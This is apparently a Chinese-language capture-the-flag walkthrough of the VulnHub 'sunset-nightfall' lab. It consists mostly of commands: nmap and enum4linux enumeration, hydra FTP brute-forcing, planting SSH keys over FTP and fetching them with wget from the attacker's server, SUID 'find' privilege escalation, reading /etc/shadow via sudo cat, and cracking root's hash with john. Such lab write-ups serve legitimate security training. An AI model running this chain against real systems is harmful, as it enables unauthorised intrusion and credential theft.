猫宁~~~
地址:https://www.vulnhub.com/entry/sunset-nightfall,355/
重视工具和思路。
nmap 192.168.43.0/24
靶机IP 192.168.43.14
nmap -A -p1-65535 192.168.43.14
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
访问http://192.168.43.14/,显示apache2 debian页面
enum4linux 192.168.43.14
S-1-22-1-1000 Unix User
ightfall (Local User)
S-1-22-1-1001 Unix Usermatt (Local User)
海外常见密码前10万
https://www.ncsc.gov.uk/static-assets/documents/PwnedPasswordsTop100k.txt
hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/top1000.txt -f 192.168.43.14 ftp
账号密码matt/cheese
ftp://192.168.43.14/,登录,目录是/home/matt
攻击机上输入ssh-keygen
生成/root/.ssh/id_rsa.pub,/root/.ssh/id_rsa
cat id_rsa.pub > authorized_keys
ftp 192.168.43.14
mkdir .ssh
cd .ssh
put id_rsa.pub
put authorized_keys
put id_rsa
ssh matt@192.168.43.14,成功登录
查找suid权限的
find / -perm -u=s -type f 2>/dev/null
ls -al /scripts/find
cat /etc/passwd
发现nightfall用户
cd /home/nightfall
cat user.txt
97fb7140ca325ed96f67be3c9e30083d
获取nightfall权限
/scripts/find . -exec "/bin/sh" -p ;
sudo -l,失败
python3 -m http.server 8080
cd /home/nightfall
la -al
cd .ssh
wget http://192.168.43.154:8080/authorized_keys
ssh nightfall@192.168.43.14,获得nightfall权限
sudo -l
(root) NOPASSWD: /usr/bin/cat
sudo /usr/bin/cat /etc/shadow
复制root第二个字段,命名为mima.txt
john /root/Desktop/mima.txt,破解为miguel2
su root,输入密码就行
cat root_super_secret_flag.txt,家目录
flag{9a5b21fc6719fe33004d66b703d70a39}